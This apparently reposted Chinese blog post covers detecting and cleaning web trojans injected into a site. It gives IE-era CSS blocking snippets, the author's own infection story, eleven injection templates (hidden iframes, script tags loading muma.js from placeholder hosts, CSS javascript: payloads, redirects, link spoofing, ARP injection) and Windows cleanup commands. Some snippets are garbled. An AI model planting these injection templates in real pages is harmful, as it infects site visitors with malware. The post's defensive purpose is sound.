zoukankan      html  css  js  c++  java
  • 删除网站木马

    如果网站被挂马,又找不到被挂马的网页吗可以在网页中插入以下代码

    <script>
    iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
    script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}</script>


    原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。

    缺点:访客无法看到被感染了<script>木马的页面。

    解决方案2:

    <script>

    iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
    script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

    <script>


    原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。

    这几天,vich在写一个程序,意外中发现vich的排名下降了很多,流量也很少!分析了下HTML代码,在</html>后多了一句“<script src=http://ntrjj.cn></script>”的代码!一直是以为用的是免费空间的原因,在咨询空间的负责人后发现并不是那样 -_-!   网站被挂马了,今天从ftp里找到了所有的“<script src=http://ntrjj.cn></script>”,并删除掉,可原因并没有找到,在这里vich搜集了点儿几种清除网页木马的方法,希望能帮助有如同我一样遭遇的网友-----

    一、首先要确认是什么网页木马,可以从杀毒软件中获得信息,通过他的症状判断是哪一种类型的木马。
    二、通常网页木马的代码都是是这样的,我提供一些资料希望对大家有帮助,以便查看网马的代码是哪段
    1:框架挂马
    <iframe src=地址 width=0 height=0></iframe>
    2:js文件挂马
    首先将以下代码

    document.write("<iframe width='0' height='0' src='地址'></iframe>");
    保存为xxx.js,
    则JS挂马代码为
    <script language=javascript src=xxx.js></script>
    3:js变形加密
    <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
    muma.txt可改成任意后缀
    4:body挂马
    <body onload="window.location='地址';"></body>
    5:隐蔽挂马
    top.document.body.innerHTML = top.document.body.innerHTML + '\r\n
    <iframe http://www.xxx.com/muma.htm/&quot;>'">http://www.xxx.com/muma.htm/"></iframe>';
    6:css中挂马
    body {
    background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
    7:JAJA挂马
    <SCRIPT language=javascript>
    window.open ("地址","","toolbar=no,location=no,directories=no,status=no,
    menubar=no,scro llbars=no,width=1,height=1");
    </script>
    8:图片伪装
    <html>
    <iframe src="网马地址" height=0 width=0></iframe>
    <img src="图片地址"></center>
    </html>
    9:伪装调用:
    <frameset rows="444,0" cols="*">
    <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
    <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
    </frameset>
    10:高级欺骗
    <a href=http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)
    onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
    <SCRIPT Language="JavaScript">
    function www_163_com ()
    {
    var url="网马地址";
    open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,
    menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
    }
    </SCRIPT>
    11: 超级网马—通过arp欺骗来直接挂马
    原理:arp中间人攻击,实际上相当于做了一次代理。
    正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
    arp中间人攻击时候: A---->C---->B
    B---->C---->A
    实际上,C在这里做了一次代理的作用
    那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。)
    以上是比较历害的网页木马代码
    三、 种了木马如何处理呢?
    1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm
    2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...
    3、修改键值wm.htm为wm_nnd.htm。
    4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。cain.exe,据说是密码嗅探器。
    5、修改键值cain.exe为cain_nnd.exe。
    6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。
    7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。
    8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序
    9、发现temp*.exe(全名记不清了),立马net stop server 。
    10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。
    11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。
    12、观察了几天,没再发生挂马的现象。
    四、通过检测网络连接查看服务器是否中了木马或病毒
    1、使用netstat -an 查看所有和本地计算机建立连接的IP。
    2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。
    3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下
    REM 注释:监控的时间
    time /t>>Netstat.log
    REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件
    Netstat -n -p tcp 30>>Netstat.log
    注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。
    仅仅这些还不够,说说更严重的:
    1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。
    2、赶快检测系统帐户:
    a、在命令行下输入net user,查看计算机上有些什么用户。
    b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。
    c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,那么别人在你的计算机上克隆账户的概率为90%。
    d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。

  • 相关阅读:
    win7 iis7 配置如何让局域网内其它用户访问
    WPF依赖项属性详解一
    项目管理SOW(工作说明书)
    新建silverlight 4 应用程序时出错:需要更新 microsoft visual studio 以面向 silverlight4
    WPF触发器(trigger)详解
    public,private,protected,internal作用
    抽象类,密封类及类成员
    java8 lanbda表达式对list对象去重,对象属性转成string
    window10环境ngnix配置https记录
    java动态调用webservice(.asmx?wsdl)
  • 原文地址:https://www.cnblogs.com/bestsaler/p/1835495.html
Copyright © 2011-2022 走看看